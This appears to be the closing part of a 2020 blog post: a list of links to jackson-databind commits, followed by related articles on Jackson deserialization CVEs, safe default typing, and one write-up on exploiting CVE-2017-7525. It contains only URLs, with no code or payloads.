https://github.com/FasterXML/jackson-databind/commit/72cd4025a229fb28ec133235003dd4616f70afaa
https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b
https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44
https://github.com/FasterXML/jackson-databind/commit/6ce32ffd18facac6abdbbf559c817b47fcb622c1
https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2
https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92
https://github.com/FasterXML/jackson-databind/commit/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05
https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1

 

Related articles

https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
https://medium.com/@cowtowncoder/jackson-2-11-features-40cdc1d2bdf3
https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba
https://medium.com/@cowtowncoder/jackson-2-10-features-cd880674d8a2
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
https://xz.aliyun.com/t/8011

  

posted @ 2020-05-05 23:21  7hang